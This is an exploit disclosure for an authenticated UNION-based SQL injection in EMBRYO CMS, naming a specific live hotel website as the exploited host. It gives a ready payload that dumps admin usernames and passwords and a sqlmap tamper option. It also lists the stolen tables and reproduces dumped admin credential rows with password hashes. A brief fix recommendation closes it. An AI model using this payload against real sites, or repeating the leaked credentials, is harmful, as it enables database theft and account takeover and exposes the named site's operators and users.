# Exploit Title: EMBRYO CMS by Pyxis Studio - Authenticated SQL Injection # Exploited Host: https://www.embryohotel.com/ # Exploit Author: 0x6ick # Vendor Homepage: https://pyxisstudio.com/ # Software Link: N/A # Version: unknown # Tested On: Linux server running MySQL 5.0.12+ ## Vulnerability Details: An SQL injection vulnerability was discovered in the EMBRYO CMS by Pyxis Studio used on www.embryohotel.com. The vulnerable parameter allows authenticated users to perform UNION-based SQL injection, leading to full database dump, including admin credentials. ## Proof of Concept: Vulnerable Parameter: GET /somepage.php?id=1' UNION SELECT ... Payload: 1' UNION SELECT 1,2,group_concat(username,0x3a,password),4 FROM admin-- Tamper: `--tamper=space2comment` ## Dumped Tables: - admin.csv (with SHA1-hashed passwords) - contact.csv - room.csv, room_image.csv - room_option.csv, room_option_reletive.csv - slideshow.csv, slideshow_mobile.csv - local_area.csv Example Dump: id,password,username,permission 1,e742c63f03ab602f2b38433ffc28b5145ba1332d,admin,1 2,89d36b5c82506f89c135b9794af7212cb5406dfcf,ARMERX,0 ## Impact: Full disclosure of administrator credentials and sensitive data. ## Recommendation: Sanitize all user input using parameterized queries. Avoid direct SQL string concatenation. Update EMBRYO CMS with proper security filters. # Discovered & Reported by: 0x6ick